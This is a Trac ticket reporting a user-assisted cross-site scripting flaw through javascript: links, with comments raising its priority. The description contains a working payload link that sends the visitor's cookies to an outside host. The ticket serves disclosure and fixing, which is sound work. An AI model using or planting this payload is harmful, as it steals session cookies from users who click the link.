Opened 14 years ago
Last modified 14 years ago
#9557 closed defect
User-assisted XSS risk via javascript: links — at Version 3
| Reported by: | Owned by: | ||
|---|---|---|---|
| Priority: | high | Milestone: | 0.11.8 |
| Component: | general | Version: | 0.11-stable |
| Severity: | major | Keywords: | security |
| Cc: | Branch: | ||
| Release Notes: | |||
| API Changes: | |||
| Internal Changes: | |||
Description (last modified by )
[javascript://%0Alocation='https://mattmccutchen.net/private/trac-javscript-link?'+encodeURIComponent(document.cookie); Click here to send me your cookies.]
This should be blocked by checking link targets against the same set of safe schemes that the HTML sanitizer uses.
Change History (4)
comment:1 by , 14 years ago
comment:2 by , 14 years ago
| Milestone: | → 0.12.1 |
|---|---|
| Priority: | normal → high |
| Severity: | normal → major |
Interesting. Thanks for the report!
Maybe even for 0.11.7.1?
comment:3 by , 14 years ago
| Description: | modified (diff) |
|---|
And removed the actual link before too many people click on it :)
Note:
See TracTickets
for help on using tickets.
open your door